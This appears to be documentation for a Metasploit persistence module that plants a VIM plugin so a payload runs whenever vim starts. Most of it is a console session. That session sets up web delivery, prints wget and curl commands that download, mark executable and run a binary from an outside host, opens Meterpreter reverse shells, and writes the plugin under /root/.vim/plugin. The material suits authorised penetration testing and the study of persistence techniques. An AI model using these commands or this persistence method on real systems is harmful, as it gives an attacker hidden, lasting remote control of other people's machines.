## Vulnerable Application This module creates a VIM Plugin which executes a payload on VIM startup. ## Verification Steps 1. Install the application if needed 2. Start msfconsole 3. Get a shell on a linux computer with vim installed 4. Do: `use exploit/linux/persistence/vim_persistence` 5. Do: `run` 6. Start `vim` on the remote computer 7. You should get a shell. ## Options ### NAME Name of the extension. Defaults to random. ## Scenarios ### vim 9.1.2141 on Kali 2026.1 ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown msf exploit(multi/script/web_delivery) > [*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 1.1.1.1 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: h00die meterpreter > sysinfo Computer : h00die-kali OS : Debian (Linux 6.18.12+kali-amd64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1... msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(linux/persistence/vim_persistence) > set session 1 session => 1 msf exploit(linux/persistence/vim_persistence) > exploit [*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV& [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable) [!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere. [!] The service is running, but could not be validated. VIM is installed [*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc ``` Open vim ``` [*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ [*] Sending payload to 1.1.1.1 (curl/8.18.0) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 1.1.1.1 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400 ```